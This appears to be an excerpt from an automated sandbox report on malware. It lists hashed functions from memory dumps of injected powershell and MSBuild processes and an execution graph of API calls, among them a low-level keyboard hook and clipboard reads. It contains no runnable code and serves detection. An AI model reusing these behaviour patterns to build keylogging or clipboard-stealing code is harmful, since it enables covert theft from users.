                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04AE9410 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 063e55894ad2996afd0464647a4337c90aedad6ffee08d82ec9985ac9416c708
                                                                  • Instruction ID: 152d507d24b26f0da66b9368670ded95a71867a2edf6e63402ec533d2c242855
                                                                  • Opcode Fuzzy Hash: 063e55894ad2996afd0464647a4337c90aedad6ffee08d82ec9985ac9416c708
                                                                  • Instruction Fuzzy Hash: 3311C974A00209AFDB05DF98D884EDDBBB6BF88314F288558E415AB361C771E982CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04AE85E4 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ce92fbc010ca55da626bdca9f6ba56b5594f9b91576489161eeea5968dc955ae
                                                                  • Instruction ID: e49a28a0cf2a29fd2024ac3612a5de71a9ecd4e83486ebb880f24be2a3741eea
                                                                  • Opcode Fuzzy Hash: ce92fbc010ca55da626bdca9f6ba56b5594f9b91576489161eeea5968dc955ae
                                                                  • Instruction Fuzzy Hash: 8C11EF74A01209EFDB05DF94D884E9DBBF1BF88314F288559E415AB361C775E981CF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04AE49EC Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a663d0852f89f77668a8b1d2b5cc322c7529023bda8c27ea4ed07a86ec036461
                                                                  • Instruction ID: 81281464b36b5645c5735675ddec3b570333b586165f6704de84875724c6f5bc
                                                                  • Opcode Fuzzy Hash: a663d0852f89f77668a8b1d2b5cc322c7529023bda8c27ea4ed07a86ec036461
                                                                  • Instruction Fuzzy Hash: E911EC74A00219EFDB05CF94D884EADBBF6BF88314F288555E514AB365C775E981CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00F5D01D Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1601666913.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_f5d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12da4440bbacfa1f3d2ac122484824c0d5c4ced93f37c9a15bf8949809c8c2ae
                                                                  • Instruction ID: 6938870c75122be03a2f6633f9feb3e3c200f699764f00d1cab196f033108c7a
                                                                  • Opcode Fuzzy Hash: 12da4440bbacfa1f3d2ac122484824c0d5c4ced93f37c9a15bf8949809c8c2ae
                                                                  • Instruction Fuzzy Hash: DA012B724067409FE7304A15CC84B67BBD8EF81731F18C019DE084B2C6C3789849DAB1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00F5D01C Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1601666913.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_f5d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b2ddd7a4e865d7c99fca67a170f15c693a219fbfa8a9548d713977f83749cdf
                                                                  • Instruction ID: 9aaeb11b3fd16a5dbbf70685a1a3591956332718fb09563ae27562b3bfbfda30
                                                                  • Opcode Fuzzy Hash: 8b2ddd7a4e865d7c99fca67a170f15c693a219fbfa8a9548d713977f83749cdf
                                                                  • Instruction Fuzzy Hash: 32F0F072805344AFE7208E16CC84B63FFE8EB41735F18C05AEE484F286C279AC45CAB1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 00F5D6E4 Relevance: .1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1601666913.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_f5d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f4a4ded7af922819eff733940167de0b02284ac05adcefd790733a5868dd3e6
                                                                  • Instruction ID: 71048fb2ef290425d43f1b29d68b53ae98ec99f09eefe0983838d4d6f1db225c
                                                                  • Opcode Fuzzy Hash: 9f4a4ded7af922819eff733940167de0b02284ac05adcefd790733a5868dd3e6
                                                                  • Instruction Fuzzy Hash: 8A2133B2901300DFDB24DF10E9C0F16BF65FB98325F20C568DE094B206C336D85AEAA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 075C3FC0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fl$(fl$(fl$(fl
                                                                  • API String ID: 0-2123353879
                                                                  • Opcode ID: 3c0ad1106d99c6a02c2df9bbb5fb108cbc8040dec460c3314c34d9ae795ef0f5
                                                                  • Instruction ID: 355df223026de55bfeb126c1de3b13ba08aeb64df601082374ad6f6fa3c46c2f
                                                                  • Opcode Fuzzy Hash: 3c0ad1106d99c6a02c2df9bbb5fb108cbc8040dec460c3314c34d9ae795ef0f5
                                                                  • Instruction Fuzzy Hash: 337160B4A00245DFDB14DF98C961FAABBB2BF89310F24846AD8016F755DB72DC81CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage:12.6%
                                                                  Dynamic/Decrypted Code Coverage:98.5%
                                                                  Signature Coverage:1.5%
                                                                  Total number of Nodes:205
                                                                  Total number of Limit Nodes:28
                                                                  execution_graph 38493 23229c80 DuplicateHandle 38494 23229d16 38493->38494 38495 ab0848 38497 ab084e 38495->38497 38496 ab091b 38497->38496 38499 ab1392 38497->38499 38500 ab13a6 38499->38500 38501 ab14a0 38500->38501 38508 23222e20 38500->38508 38514 23222e10 38500->38514 38520 ab7e78 38500->38520 38524 ab7e88 38500->38524 38528 ab7fa0 38500->38528 38535 2322d128 38500->38535 38501->38497 38509 23222e32 38508->38509 38512 23222ee3 38509->38512 38541 2322137c 38509->38541 38511 23222ea9 38545 2322139c 38511->38545 38512->38500 38515 23222e32 38514->38515 38516 2322137c GetModuleHandleW 38515->38516 38518 23222ee3 38515->38518 38517 23222ea9 38516->38517 38519 2322139c KiUserCallbackDispatcher 38517->38519 38518->38500 38519->38518 38522 ab7e9e 38520->38522 38521 ab800a 38521->38500 38522->38521 38581 abf5f7 38522->38581 38526 ab7e9e 38524->38526 38525 ab800a 38525->38500 38526->38525 38527 abf5f7 3 API calls 38526->38527 38527->38525 38529 ab7faa 38528->38529 38530 ab7fc4 38529->38530 38532 2323fa52 3 API calls 38529->38532 38533 2323fa60 3 API calls 38529->38533 38531 ab800a 38530->38531 38534 abf5f7 3 API calls 38530->38534 38531->38500 38532->38530 38533->38530 38534->38531 38536 2322d130 38535->38536 38537 2322d175 38536->38537 38596 2322d20a 38536->38596 38600 2322d188 38536->38600 38604 2322d178 38536->38604 38537->38500 38542 23221387 38541->38542 38549 232243e0 38542->38549 38543 2322348a 38543->38511 38546 232213a7 38545->38546 38548 2322ae3b 38546->38548 38577 232297a4 38546->38577 38548->38512 38550 2322440b 38549->38550 38556 23224960 38550->38556 38560 23224951 38550->38560 38551 2322448e 38552 23223fd0 GetModuleHandleW 38551->38552 38553 232244ba 38551->38553 38552->38553 38557 2322498d 38556->38557 38558 23224a0e 38557->38558 38564 23224af1 38557->38564 38561 2322498d 38560->38561 38562 23224a0e 38561->38562 38563 23224af1 GetModuleHandleW 38561->38563 38563->38562 38573 23223fd0 38564->38573 38566 23224b09 38567 23223fd0 GetModuleHandleW 38566->38567 38568 23224cd4 38566->38568 38569 23224c5a 38567->38569 38568->38558 38569->38568 38570 23223fd0 GetModuleHandleW 38569->38570 38571 23224ca8 38570->38571 38571->38568 38572 23223fd0 GetModuleHandleW 38571->38572 38572->38568 38574 23224e10 GetModuleHandleW 38573->38574 38576 23224e85 38574->38576 38576->38566 38578 2322ae50 KiUserCallbackDispatcher 38577->38578 38580 2322aebe 38578->38580 38580->38546 38582 abf602 38581->38582 38586 2323fa52 38582->38586 38591 2323fa60 38582->38591 38583 abf609 38583->38521 38588 2323fa75 38586->38588 38587 2323fc8a 38587->38583 38588->38587 38589 2323fca1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38588->38589 38590 2323fcb0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38588->38590 38589->38588 38590->38588 38593 2323fa75 38591->38593 38592 2323fc8a 38592->38583 38593->38592 38594 2323fca1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38593->38594 38595 2323fcb0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38593->38595 38594->38593 38595->38593 38597 2322d1c5 38596->38597 38599 2322d208 38597->38599 38608 2322cb90 38597->38608 38599->38536 38602 2322d1a5 38600->38602 38601 2322d208 38601->38536 38602->38601 38603 2322cb90 SetWindowsHookExA 38602->38603 38603->38602 38606 2322d188 38604->38606 38605 2322d208 38605->38536 38606->38605 38607 2322cb90 SetWindowsHookExA 38606->38607 38607->38606 38610 2322d390 SetWindowsHookExA 38608->38610 38611 2322d41a 38610->38611 38611->38597 38612 a0d044 38613 a0d05c 38612->38613 38614 a0d0b6 38613->38614 38619 2322a862 38613->38619 38627 23224104 38613->38627 38635 23226070 38613->38635 38639 23226062 38613->38639 38622 2322a86a 38619->38622 38620 2322a8e9 38624 2322a8e7 38620->38624 38655 2322974c 38620->38655 38622->38614 38622->38620 38623 2322a8d9 38622->38623 38643 2322aa00 38623->38643 38649 2322aa10 38623->38649 38628 2322410f 38627->38628 38629 2322a8e9 38628->38629 38631 2322a8d9 38628->38631 38630 2322974c 3 API calls 38629->38630 38632 2322a8e7 38629->38632 38630->38632 38633 2322aa00 3 API calls 38631->38633 38634 2322aa10 3 API calls 38631->38634 38633->38632 38634->38632 38636 23226096 38635->38636 38637 23224104 3 API calls 38636->38637 38638 232260b7 38637->38638 38638->38614 38640 23226070 38639->38640 38641 23224104 3 API calls 38640->38641 38642 232260b7 38641->38642 38642->38614 38644 2322aa1e 38643->38644 38645 2322974c 3 API calls 38644->38645 38646 2322aaf6 38644->38646 38662 2322aef0 38644->38662 38668 2322aee0 38644->38668 38645->38644 38646->38624 38651 2322aa1e 38649->38651 38650 2322974c 3 API calls 38650->38651 38651->38650 38652 2322aaf6 38651->38652 38653 2322aee0 2 API calls 38651->38653 38654 2322aef0 2 API calls 38651->38654 38652->38624 38653->38651 38654->38651 38656 23229757 38655->38656 38657 2322ab52 38656->38657 38658 2322abfc 38656->38658 38660 2322abaa CallWindowProcW 38657->38660 38661 2322ab59 38657->38661 38659 23224104 2 API calls 38658->38659 38659->38661 38660->38661 38661->38624 38663 2322af0f 38662->38663 38664 2322af87 38663->38664 38674 2322b097 38663->38674 38680 2322b0ad 38663->38680 38686 2322b0a8 38663->38686 38664->38644 38670 2322aee6 38668->38670 38669 2322aed6 38669->38644 38670->38669 38671 2322b097 2 API calls 38670->38671 38672 2322b0a8 2 API calls 38670->38672 38673 2322b0ad 2 API calls 38670->38673 38671->38670 38672->38670 38673->38670 38675 2322b0a2 38674->38675 38676 2322b0c4 38675->38676 38692 2322b0e2 38675->38692 38697 2322b0f0 38675->38697 38676->38663 38677 2322b0d9 38677->38663 38681 2322b0b6 38680->38681 38682 2322b0c4 38680->38682 38681->38682 38684 2322b0e2 2 API calls 38681->38684 38685 2322b0f0 2 API calls 38681->38685 38682->38663 38683 2322b0d9 38683->38663 38684->38683 38685->38683 38688 2322b0b0 38686->38688 38687 2322b0c4 38687->38663 38688->38687 38690 2322b0e2 2 API calls 38688->38690 38691 2322b0f0 2 API calls 38688->38691 38689 2322b0d9 38689->38663 38690->38689 38691->38689 38693 2322b0ea 38692->38693 38695 2322b161 38693->38695 38702 2322b1b4 38693->38702 38694 2322b123 38694->38677 38698 2322b102 38697->38698 38700 2322b161 38698->38700 38701 2322b1b4 2 API calls 38698->38701 38699 2322b123 38699->38677 38701->38699 38703 2322b1c8 38702->38703 38710 2322b2a0 38703->38710 38714 2322b290 38703->38714 38704 2322b1dd 38706 2322b1e1 38704->38706 38718 2322b7b8 38704->38718 38706->38694 38711 2322b2a8 38710->38711 38722 232299cc 38711->38722 38715 2322b2a8 38714->38715 38716 232299cc OleInitialize 38715->38716 38717 2322b2b1 38716->38717 38717->38704 38719 2322b7cd 38718->38719 38721 2322b1ff 38719->38721 38729 232299f4 38719->38729 38721->38694 38723 232299d7 38722->38723 38724 2322b2b1 38723->38724 38726 232299dc 38723->38726 38724->38704 38727 2322b318 OleInitialize 38726->38727 38728 2322b37c 38727->38728 38728->38724 38730 2322b860 OleGetClipboard 38729->38730 38732 2322b8fa 38730->38732 38733 23224e0a 38734 23224e10 GetModuleHandleW 38733->38734 38736 23224e85 38734->38736 38486 23225eb8 38487 23225f20 CreateWindowExW 38486->38487 38489 23225fdc 38487->38489 38481 42329a8 38483 42329c4 38481->38483 38482 4232ad4 38483->38482 38484 2323fa52 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38483->38484 38485 2323fa60 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 38483->38485 38484->38483 38485->38483 38490 118a2c5 TerminateThread 38491 118a04e 38490->38491 38492 115782f 38490->38492 38491->38490 38491->38492

                                                                  Executed Functions

                                                                  Function 23232358 Relevance: 5.3, Strings: 3, Instructions: 1505COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: T6{"$T6{"$p%{"
                                                                  • API String ID: 0-895129875
                                                                  • Opcode ID: 7448454ddb560a368d49b2e1dc32a5cb040d16e2ee14cd782b1503f71434f404
                                                                  • Instruction ID: d7a1d8606c1b5d9e1cfe6230cb87580f06177f140325adbc515f9316e30b5272
                                                                  • Opcode Fuzzy Hash: 7448454ddb560a368d49b2e1dc32a5cb040d16e2ee14cd782b1503f71434f404
                                                                  • Instruction Fuzzy Hash: 0ED27A70A10315CFDB14EB68C994A9DB7B2FF8A310F54C5A9D409AB362DB35ED85CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0118A2C5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 270threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 613 118a2c5-118a2ed TerminateThread 614 1189ee2-1189ee8 613->614 615 118a2f3-118a2ff 613->615 618 1189eea-1189ef6 614->618 619 1189e6c 614->619 616 118a305-118a30f 615->616 617 118a0a7-118a0ba 615->617 620 118a0bc 617->620 621 118a130-118a132 617->621 622 1189edc-1189edf 618->622 623 1189ef8-1189efa 618->623 619->622 624 118a138-118a144 620->624 625 118a0be 620->625 621->624 622->614 628 118a031-118a033 623->628 624->614 629 118a14a-118a18f 624->629 626 118a0c0-118a0cc 625->626 627 118a041 625->627 630 118a04e 626->630 631 118a0ce-118a0e9 626->631 627->628 632 118a034-118a040 628->632 629->614 633 118a195-118a1a3 629->633 630->632 637 118a050-118a06e 630->637 634 118a0ec-118a10e 631->634 632->627 635 1157885-115788c 633->635 636 118a1a9-118a1bd 633->636 634->614 638 118a114 634->638 639 1157873-115787d 635->639 640 115788e-11578ad 635->640 636->614 641 118a1c3-118a210 636->641 637->634 642 118a070-118a072 637->642 643 118a115-118a12f 638->643 644 1157862-1157872 639->644 645 115787f-1157884 639->645 651 115782f 640->651 652 11578af-11578c1 640->652 641->643 646 118a216-118a28f 641->646 642->617 643->621 644->639 645->635 646->635 649 118a295-118a2c2 646->649 649->613 653 1157831-1157846 651->653 654 115784a-1157860 651->654 653->654 654->644
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2588095660.0000000001130000.00000040.00000400.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_1130000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: TerminateThread
                                                                  • String ID: !$'+
                                                                  • API String ID: 1852365436-1895281246
                                                                  • Opcode ID: ce1170fe8fd34c51e907ca2c7eabf5b907fb7f31703edad3c69e2ab146599fce
                                                                  • Instruction ID: 8c3a1b456913f859aa7fb418372abbff497222fd391ad92c602967a21b8a323d
                                                                  • Opcode Fuzzy Hash: ce1170fe8fd34c51e907ca2c7eabf5b907fb7f31703edad3c69e2ab146599fce
                                                                  • Instruction Fuzzy Hash: 6981E2756013569FDB299D3C8CA13EA3BF3AF96294FA4822BCC91C7685D73184878B41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 232355A8 Relevance: 1.9, Strings: 1, Instructions: 603COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $
                                                                  • API String ID: 0-3993045852
                                                                  • Opcode ID: f4f64c1a4d53340f250a263f34b0fae2e259a64e1cafa774f753bf659b9d2ee3
                                                                  • Instruction ID: 617be79a2aa7352e60d01abdcd8158b8a2b437221e351a9b3173ed2a51ad6a0f
                                                                  • Opcode Fuzzy Hash: f4f64c1a4d53340f250a263f34b0fae2e259a64e1cafa774f753bf659b9d2ee3
                                                                  • Instruction Fuzzy Hash: EC22C571E002198FDB10DBA4C89069EBBFAFF86310F2985A9D409EB345DB35DD85CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2322CB90 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,2322D1F8,00000000,00000000), ref: 2322D40B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 1d5f0fe8c634702f3cca32bb9dbe281ea2933a5ed502d840dfc9a96d1962af49
                                                                  • Instruction ID: 6b80e450585a96f57c0408f5166f88599757149799e4a81426a268a23c8c56a1
                                                                  • Opcode Fuzzy Hash: 1d5f0fe8c634702f3cca32bb9dbe281ea2933a5ed502d840dfc9a96d1962af49
                                                                  • Instruction Fuzzy Hash: E6212771D006099FDB14DFAAD844BEEFBF5EF88310F10842AE429A7250C774A944CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323C1B8 Relevance: .6, Instructions: 648COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 89816946d80f619bfb36538dabbee2d012c1de93cf128ed053e94a5a08e7846c
                                                                  • Instruction ID: 74bc556ad1dc9f1ebb3377104580e9967abe019784b20cdc680e66eb6e4090f1
                                                                  • Opcode Fuzzy Hash: 89816946d80f619bfb36538dabbee2d012c1de93cf128ed053e94a5a08e7846c
                                                                  • Instruction Fuzzy Hash: CD32B170B002158FDB04EF68CC90B9EB7B6EB8A310F149965D505EB352DB39ED81CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 2323B25B Relevance: .6, Instructions: 568COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6871d20d1d0a937a46ae9fe1ba1039f307d91c2388ce4f05683843602458b95a
                                                                  • Instruction ID: 8e4be7ae3b6510c9fdbde0ea436e8e7bddc8a92bbf35eb3fc4a8d915a44a4aa5
                                                                  • Opcode Fuzzy Hash: 6871d20d1d0a937a46ae9fe1ba1039f307d91c2388ce4f05683843602458b95a
                                                                  • Instruction Fuzzy Hash: 102262B0B0020A8FEB14EF59D894B9DB7B6EB86310F688565E405DB392DB38DDC1CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23235D00 Relevance: .4, Instructions: 429COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 136b4bbfe333dc1417402ef2dbca834442f41617d2ecec19cf4c5a3f4e4e6652
                                                                  • Instruction ID: 554ebb347e99bdf004f5972e64eb108f42ef08da77f97ec6cad93189c3be2bb7
                                                                  • Opcode Fuzzy Hash: 136b4bbfe333dc1417402ef2dbca834442f41617d2ecec19cf4c5a3f4e4e6652
                                                                  • Instruction Fuzzy Hash: 5AE12B71B001158FDB04DB68C884A5EBBFEFF8A710F2585AAE54ADB352CA31DD81C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23236A38 Relevance: 3.0, Strings: 2, Instructions: 500COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1105 23236a38-23236a58 1106 23236a5a-23236a5d 1105->1106 1107 23236a63-23236a73 call 23232060 1106->1107 1108 23236b6f-23236b72 1106->1108 1118 23236b64-23236b6e 1107->1118 1119 23236a79-23236aac 1107->1119 1109 23236b92-23236b95 1108->1109 1110 23236b74-23236b8d 1108->1110 1112 23236b97-23236bb3 1109->1112 1113 23236bb8-23236bbb 1109->1113 1110->1109 1112->1113 1115 23236bc8-23236bcb 1113->1115 1116 23236bbd-23236bc7 1113->1116 1120 23236be2-23236be5 1115->1120 1121 23236bcd-23236bdb 1115->1121 1140 23236aba 1119->1140 1141 23236aae-23236ab8 1119->1141 1124 23236beb-23236c62 1120->1124 1125 23236cce-23236cd1 1120->1125 1121->1116 1132 23236bdd 1121->1132 1168 23236d15-23236d25 1124->1168 1169 23236c68-23236cbd 1124->1169 1128 23236cd3-23236cee 1125->1128 1129 23236cf9-23236cfb 1125->1129 1128->1124 1145 23236cf4 1128->1145 1134 23236d02-23236d05 1129->1134 1135 23236cfd 1129->1135 1132->1120 1134->1106 1136 23236d0b-23236d14 1134->1136 1135->1134 1143 23236abf-23236ac1 1140->1143 1141->1143 1146 23236ac7-23236acb 1143->1146 1147 23236b4d-23236b5e call 23232060 1143->1147 1145->1129 1149 23236acd-23236ada 1146->1149 1150 23236adc 1146->1150 1147->1118 1147->1119 1153 23236ae1-23236ae3 1149->1153 1150->1153 1153->1147 1155 23236ae5-23236ae7 1153->1155 1156 23236af5 1155->1156 1157 23236ae9-23236af3 1155->1157 1159 23236afa-23236afc 1156->1159 1157->1159 1159->1147 1160 23236afe-23236b46 call 232365b8 1159->1160 1160->1147 1173 23236d4a-23236d4d 1168->1173 1174 23236d28-23236d29 1168->1174 1169->1107 1203 23236cc3-23236ccd 1169->1203 1175 23236d4e-23236d51 1173->1175 1174->1175 1176 23236d2c-23236d49 1174->1176 1179 23236d53-23236d6f 1175->1179 1180 23236d74-23236d77 1175->1180 1176->1173 1179->1180 1183 23236da0-23236da2 1180->1183 1184 23236d79-23236d93 call 232321d0 1180->1184 1185 23236da4 1183->1185 1186 23236da9-23236dac 1183->1186 1202 23236d98-23236d9b 1184->1202 1185->1186 1186->1175 1190 23236dae-23236dba 1186->1190 1193 23236dc0-23236dc9 1190->1193 1194 2323706c-2323706f 1190->1194 1198 23237071-2323708f 1193->1198 1199 23236dcf-23236df0 1193->1199 1197 23237096-2323709f 1194->1197 1198->1197 1208 23236df2-23236df5 1199->1208 1209 23236dfa-23236e34 1199->1209 1202->1183 1208->1197 1216 23236e36-23236e39 1209->1216 1217 23236e3e-23236e44 1209->1217 1216->1197 1218 2323705a-23237066 1217->1218 1219 23236e4a-23236eb0 1217->1219 1218->1193 1218->1194 1219->1198 1228 23236eb6-23236ec0 1219->1228 1228->1198 1229 23236ec6-23236edc 1228->1229 1229->1198 1231 23236ee2-23236efd 1229->1231 1234 23236eff-23236f04 1231->1234 1235 23236f0c-23236f13 1231->1235 1234->1235 1235->1198 1236 23236f19-23236f23 1235->1236 1237 23236f32-23236f39 1236->1237 1238 23236f25-23236f2a 1236->1238 1237->1198 1239 23236f3f-23236f49 1237->1239 1238->1237 1240 23236f4b-23236f50 1239->1240 1241 23236f58-23236f5f 1239->1241 1240->1241 1241->1198 1242 23236f65-23236f75 1241->1242 1243 23236f77-23236f7c 1242->1243 1244 23236f84-23236f8b 1242->1244 1243->1244 1244->1198 1245 23236f91-23236f9b 1244->1245 1246 23236faa-23236fb1 1245->1246 1247 23236f9d-23236fa2 1245->1247 1246->1198 1248 23236fb7-23236fcf 1246->1248 1247->1246 1250 23236fd1-23236fde 1248->1250 1251 23236fe0 1248->1251 1252 23236fe5-23236fe7 1250->1252 1251->1252 1253 23236fe9-23236feb 1252->1253 1254 2323704d-23237054 1252->1254 1255 23236ff9 1253->1255 1256 23236fed-23236ff7 1253->1256 1254->1218 1254->1219 1257 23236ffe-23237000 1255->1257 1256->1257 1257->1254 1258 23237002-23237046 call 232365b8 1257->1258 1258->1254
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: T6{"$p%{"
                                                                  • API String ID: 0-1447899720
                                                                  • Opcode ID: 5db935c3ed9b4ce93dc0a1b575ed2517acf71507acc4fd1b3bd3faa9f46e2b8c
                                                                  • Instruction ID: 0c84e28f010645758b5f14e2b9eb291595af04c0af74f0283eff549073a00cb5
                                                                  • Opcode Fuzzy Hash: 5db935c3ed9b4ce93dc0a1b575ed2517acf71507acc4fd1b3bd3faa9f46e2b8c
                                                                  • Instruction Fuzzy Hash: 6502CF74B00205CFDB14EB68C894B9DB7FAEF85310F1884A9E409AB391DB75ED81CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 23234B80 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
